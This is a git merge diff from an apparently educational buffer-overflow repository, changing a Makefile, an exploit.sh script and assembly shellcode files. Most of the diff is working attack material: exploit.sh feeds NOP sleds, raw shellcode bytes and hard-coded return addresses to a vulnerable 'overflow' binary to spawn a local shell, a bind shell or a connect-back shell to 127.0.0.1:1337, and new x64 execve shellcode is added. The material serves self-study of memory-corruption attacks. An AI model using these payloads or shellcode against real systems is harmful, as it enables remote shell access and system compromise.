diff options
| author | toni <toni@devlap.local> | 2015-04-13 12:48:50 +0200 |
|---|---|---|
| committer | toni <toni@devlap.local> | 2015-04-13 13:00:36 +0200 |
| commit | de17c3e7e1f412dc39b1e9b08ab735dc14a9faaa (patch) | |
| tree | e6c05412f532263bdcdeb3db909bafee51e76eaa | |
| parent | 844255f63087079326fc333601a218321ab97b3c (diff) | |
| parent | bd18cd8c67fd97f6bf0dceffae68799730ec582c (diff) | |
Merge branch 'master' of github.com:freecoding/bufflow
| -rw-r--r-- | Makefile | 2 | ||||
| -rwxr-xr-x | exploit.sh | 22 | ||||
| -rw-r--r-- | shellcode/connect.asm | 4 | ||||
| -rw-r--r-- | shellcode/execve_x64.asm | 20 |
4 files changed, 42 insertions, 6 deletions
@@ -30,6 +30,8 @@ ifeq ($(LBITS),64) -$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $@_x64 $< endif +rebuild: clean all + clean: $(RM) -f *.o $(RM) -f $(TARGETS) $(patsubst %,%_x64,$(TARGETS)) @@ -2,26 +2,40 @@ # shellcode generated with metasploit (exec /bin/sh): # ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' -# return addr ./overflow (x86): 0xbffff412 +# uses (currently) only self-written shellcode .. if [ -z "$1" ]; then - echo "$0 [local|bind]" + echo "$0 [local|bind|connect]" exit 1 fi -echo "$0: exec exploit .." +echo "$0: exec exploit ( x$(getconf LONG_BIT) ) .." if [ "$1" = "local" ]; then if [ $(getconf LONG_BIT) -eq 32 ]; then # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr # uses own shellcode: shellcode/hello.asm (x86-nasm) ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\x12\xf4\xff\xbf"'` + else + # 133xNOP + shellcode(34) + 145xNOP + return addr + # uses own shellcode: shellcode/execve_x64.o + ./overflow_x64 `python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "\x02\xe7\xff\xff\xff\x7f"'` fi elif [ "$1" = "bind" ]; then if [ $(getconf LONG_BIT) -eq 32 ]; then - # 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP + return addr + # 85xNOP + shellcode(134) + 85xNOP + return addr # uses own shellcode: shellcode/socket.asm (x86-nasm) ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x12\xf4\xff\xbf"'` + else + # 100xNOP + shellcode(149) + 63xNOP + return addr + # uses own shellcode: shellcode/socket_x64.asm (x64-nasm) + ./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05" + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'` fi +elif [ "$1" = "connect" ]; then + if [ $(getconf LONG_BIT) -eq 32 ]; then + # 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr + # uses own shellcode: shellcode/connect.asm (x86-nasm) + ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\x12\xf4\xff\xbf"'` + fi else $0 fi diff --git a/shellcode/connect.asm b/shellcode/connect.asm index 4c13b69..3464a3e 100644 --- a/shellcode/connect.asm +++ b/shellcode/connect.asm @@ -16,10 +16,10 @@ int 0x80 ; let the kernel do the stuff mov edx,eax ; move socket descriptor from socket() into eax xor eax,eax ; sockaddr_in: in_addr -push 0x1011116E ; push ip adr on the stack (XOR-encoded) +push 0x1011116E ; push ip adr on the stack (XOR-encoded -> 127.0.0.1) xor dword [esp],0x11111111 ; decode ip adr ; sockaddr_in: tcp port -push word 0x2814 ; push tcp port (XOR-encoded) +push word 0x2814 ; push tcp port (XOR-encoded -> 1337) xor word [esp],0x1111 ; decode tcp port ; sockaddr_in: sa_family push word 0x2 ; 0x2 -> AF_INET diff --git a/shellcode/execve_x64.asm b/shellcode/execve_x64.asm new file mode 100644 index 0000000..6048796 --- /dev/null +++ b/shellcode/execve_x64.asm @@ -0,0 +1,20 @@ +BITS 64 + + +; do the 'string trick' +jmp short string + +code: +xor rax,rax +pop rdi ; pop the addr of the string intro esi (stack pointer register) +mov byte [rdi + 7], al ; null-terminate the string +push rdi +mov rsi,rsp +push rax +mov rdx,rsp +mov byte al,59 ; execv +syscall + +string: +call code +db '/bin/sh' , 0xFF |